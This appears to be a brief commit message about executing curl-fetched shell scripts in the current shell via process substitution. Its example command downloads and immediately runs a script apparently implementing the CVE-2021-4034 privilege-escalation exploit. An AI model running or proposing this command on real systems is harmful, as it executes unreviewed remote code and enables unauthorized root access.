This will execute shell-scripts that are `curl`ed using current shell.
Fixes the pipe (stdin) problems, alternatively using `bash` or `zsh`
you can use process substitution. For example:
$ bash <(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)
Signed-off-by: Harry Kurn <alternate-se7en@pm.me>